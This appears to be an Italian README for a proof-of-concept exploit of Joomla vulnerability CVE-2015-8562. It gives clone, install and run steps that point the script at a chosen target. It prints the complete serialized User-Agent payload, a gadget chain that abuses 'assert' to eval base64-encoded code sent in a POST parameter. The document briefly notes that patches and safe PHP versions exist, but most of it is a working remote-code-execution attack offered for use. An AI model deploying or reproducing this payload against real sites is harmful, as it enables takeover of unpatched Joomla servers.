
Una prova di concetto per la vulnerabilità CVE-2015-8562 di Joomla
Una proof of concept per la vulnerabilità CVE-2015-8562 di Joomla
Questa PoC è una copia quasi 1:1 dell'implementazione Python di Gary ospitata su exploit-db.
È molto semplice da installare:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
Una volta che composer ha installato tutto, dovrai cambiare $target in exploit.php.
Dopodiché sei pronto a partire:
php exploit.php
A dicembre 2015 è stata trovata una vulnerabilità in Joomla. Permette ad attaccanti remoti di condurre attacchi di injection di oggetti PHP ed eseguire codice PHP arbitrario tramite l'header HTTP User-Agent.
Questa vulnerabilità ha colpito tutte le versioni di Joomla. Una patch per le versioni v1.5.x, v2.5x e v3.x è già stata rilasciata.
Se stai eseguendo PHP >= 5.4.45, >= 5.5.29 o >= 5.6.13 sei al sicuro poiché questo exploit utilizza anche CVE-2015-6835.
Nikos Verschore di PatrolServer ha scritto un post sul blog molto dettagliato ed è stato di grande aiuto per comprendere questa vulnerabilità. Puoi usare il loro mini-scanner gratuitamente per verificare se il tuo sito è a rischio.
Ecco come appare l'header User-Agent inviato:
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}